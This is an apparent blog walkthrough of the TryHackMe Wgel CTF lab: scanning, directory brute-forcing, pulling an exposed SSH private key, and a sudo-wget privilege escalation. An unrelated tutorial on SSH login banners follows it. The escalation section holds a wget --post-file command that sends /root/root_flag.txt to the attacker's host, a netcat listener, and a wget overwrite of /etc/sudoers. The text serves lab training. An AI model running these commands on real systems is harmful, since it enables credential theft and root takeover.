TryHackMe Wgel CTF Exfiltrate the root flag

Wgel CTF is a TryHackMe machine, after listing the website we found a private key that gave us SSH access. We escalate privileges by modifying the sudoers file with Wget.


First we start with NMAP tool. TCP port scan, we see two open ports http (80) and ssh (22).

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/wgel-again]
└─$ sudo nmap -O 10.10.56.251                        
[sudo] password for hackerboy: 
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-28 23:49 IST
Nmap scan report for 10.10.56.251
Host is up (0.21s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.93%E=4%D=7/28%OT=22%CT=1%CU=40458%PV=Y%DS=2%DC=I%G=Y%TM=64C406D
OS:2%P=x86_64-pc-linux-gnu)SEQ(SP=105%GCD=1%ISR=107%TI=Z%CI=I%TS=A)SEQ(SP=1
OS:05%GCD=1%ISR=107%TI=Z%CI=I%II=I%TS=A)OPS(O1=M508ST11NW6%O2=M508ST11NW6%O
OS:3=M508NNT11NW6%O4=M508ST11NW6%O5=M508ST11NW6%O6=M508ST11)WIN(W1=68DF%W2=
OS:68DF%W3=68DF%W4=68DF%W5=68DF%W6=68DF)ECN(R=Y%DF=Y%T=40%W=6903%O=M508NNSN
OS:W6%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%D
OS:F=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O
OS:=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W
OS:=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%R
OS:IPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 2 hops

OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 31.04 seconds
                                                                                                                                                                        
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/wgel-again]
└─$ 

HTTP

Apache is running on port 80. 

GOBUSTER

Directory and file scanning with gobuster.

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/wgel-again]
└─$ sudo gobuster dir -u http://10.10.56.251/ -w /usr/share/dirb/wordlists/common.txt -t 25 -x php,html,txt -q
[sudo] password for hackerboy: 
/.html                (Status: 403) [Size: 277]
/.htpasswd.txt        (Status: 403) [Size: 277]
/index.html           (Status: 200) [Size: 11374]
/index.html           (Status: 200) [Size: 11374]
/server-status        (Status: 403) [Size: 277]
/sitemap              (Status: 301) [Size: 314] [--> http://10.10.56.251/sitemap/]
                                                                                                                                                                        
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/wgel-again]
└─$

Page web and /sitemap/

 Again we do a scan with gobuster but now to the page we found ( /sitemap/). 

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/wgel-again]
└─$ sudo gobuster dir -u http://10.10.56.251/sitemap -w /usr/share/dirb/wordlists/common.txt -t 25 -x php,html,txt -q
[sudo] password for hackerboy: 

/.htpasswd.txt        (Status: 403) [Size: 277]
/.htpasswd.php        (Status: 403) [Size: 277]
/.ssh                 (Status: 301) [Size: 319] [--> http://10.10.56.251/sitemap/.ssh/]
/about.html           (Status: 200) [Size: 12232]
/blog.html            (Status: 200) [Size: 12745]
/contact.html         (Status: 200) [Size: 10346]
/css                  (Status: 301) [Size: 318] [--> http://10.10.56.251/sitemap/css/]
/fonts                (Status: 301) [Size: 320] [--> http://10.10.56.251/sitemap/fonts/]
/images               (Status: 301) [Size: 321] [--> http://10.10.56.251/sitemap/images/]
/index.html           (Status: 200) [Size: 21080]
/index.html           (Status: 200) [Size: 21080]
/js                   (Status: 301) [Size: 317] [--> http://10.10.56.251/sitemap/js/]
/services.html        (Status: 200) [Size: 10131]
/shop.html            (Status: 200) [Size: 17257]
/work.html            (Status: 200) [Size: 11428]
                                                                                                                                                                        
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/wgel-again]
└─$ 

SSH - Jessie

We start session with Jessieand the private key we found earlier, we get an ssh shell and our first flag user_flag.txt .

An id_rsa key can be used as an alternative method to log into SSH. Meaning, we do not need a password! Maybe we can try this against the Jessie user found earlier?

Initial Access

Download the id_rsa key from the webserver with wget:

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/wgel-again]
└─$ wget http://10.10.56.251/sitemap/.ssh/id_rsa -O ./id_rsa.txt                                            
--2023-07-29 01:22:03--  http://10.10.56.251/sitemap/.ssh/id_rsa
Connecting to 10.10.56.251:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1675 (1.6K)
Saving to: ‘./id_rsa.txt’

./id_rsa.txt                              100%[=====================================================================================>]   1.64K  --.-KB/s    in 0s      

2023-07-29 01:22:03 (43.1 MB/s) - ‘./id_rsa.txt’ saved [1675/1675]

                                                                                                                                                                        
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/wgel-again]
└─$ 

Now login as Jessie:

$ chmod 600 id_rsa.txt
$ sudo chown hackerboy:hackerboy id_rsa.txt
$ ssh jessie@10.10.56.251 -i id_rsa.txt

 

Privilege Escalation

Next, we need to read the root user flag. In order to do so, we need root privileges.

A good first check is to run sudo -l to list what we can run as root:

Click on this link to learn about sudo -l (all about enumeration) - CLICK HERE

 There are two entries here: (1) we can run all commands as root, but need to know Jessie’s password, and (2) we can run wget as root.

According to the amazing GTFOBins repo we can use wget to read files. We’ll use this technique to read the root user’s flag:

sudo /usr/bin/wget --post-file=/root/root_flag.txt http://10.9.22.119:4545

# This is our system IP 10.9.22.119

# we will same port from both side 4545

Netcat listener

nc  -lvp 4545

Root flag - b1b968b37519ad1daa6408188649263d

And in the wgel machine we execute the wget command with sudo which will overwrite the file /etc/sudoers.

We are located in the folder /etc/and we execute:

sudo /usr/bin/wget 10.9.22.119:4545/sudoers --output-document=sudoers

Disclaimer

All tutorials are for informational and educational purposes only and have been made using our own routers, servers, websites and other vulnerable free resources. we do not contain any illegal activity. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. Hacking Truth is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used. We do not promote, encourage, support or excite any illegal activity or hacking.

Display a ASCII Message After SSH Login

Sometimes when you want to provide remote access to your system via SSH, you want to display a customized message on the terminal for the remotely logged-in user. In this tutorial, I will show you how to display a custom ASCII text and text message upon SSH login to your Linux server.

Requirement

You need to have installed SSH

Let's Displaying a Message

For displaying a ASCII text or normal text in linux or any other distro ,you will to perform the following steps:

Step 1 :- First you need to open a MOTD or create a file on your system with the COMMAND shown below.

┌──(hackerboy㉿KumarAtulJaiswal)-[~]
└─$ sudo nano /etc/motd
┌──(hackerboy㉿KumarAtulJaiswal)-[~]
└─$

and once this file is created or open (as you can see i have already this file in our linux system ), you can type in any messages or ASCII text as of your choice just like we did. After that, you can save this file and exit.

ASCII Creator - CLICK HERE

Step 2 :- Check your system IP

Step 3 :- Log into your machine through SSH to Display the message.

You need to log into your machine through SSH by executing the following command. You can either run this command on your own machine’s terminal or you can even use any other machine on the same network for serving the very same purpose.

┌──(hackerboy㉿KumarAtulJaiswal)-[~]
└─$ sudo su
KumarAtulJaiswal# ssh hackerboy@192.168.43.152
hackerboy@192.168.43.152's password: 
Linux KumarAtulJaiswal 5.10.0-kali8-amd64 #1 SMP Debian 5.10.40-1kali1 (2021-05-31) x86_64

The programs included with the Kali GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Kali GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.

WELCOME  TO
██   ██  █████   ██████ ██   ██ ██ ███    ██  ██████      ████████ ██████  ██    ██ ████████ ██   ██ 
██   ██ ██   ██ ██      ██  ██  ██ ████   ██ ██              ██    ██   ██ ██    ██    ██    ██   ██ 
███████ ███████ ██      █████   ██ ██ ██  ██ ██   ███        ██    ██████  ██    ██    ██    ███████ 
██   ██ ██   ██ ██      ██  ██  ██ ██  ██ ██ ██    ██        ██    ██   ██ ██    ██    ██    ██   ██ 
██   ██ ██   ██  ██████ ██   ██ ██ ██   ████  ██████         ██    ██   ██  ██████     ██    ██   ██ 
                                                                                 www.hackingtruth.in 



                                                                                                     
You have new mail.
Last login: Sun Jul 11 20:07:56 2021 from 192.168.43.152
┏━(Message from Kali developers)
┃
┃ This is a minimal installation of Kali Linux, you likely
┃ want to install supplementary tools. Learn how:
┃ ⇒ https://www.kali.org/docs/troubleshooting/common-minimum-setup/
┃
┃ We have kept /usr/bin/python pointing to Python 2 for backwards
┃ compatibility. Learn how to change this and avoid this message:
┃ ⇒ https://www.kali.org/docs/general-use/python3-transition/
┃
┗━(Run: “touch ~/.hushlogin” to hide this message)
┌──(hackerboy㉿KumarAtulJaiswal)-[~]
└─$ 

Disclaimer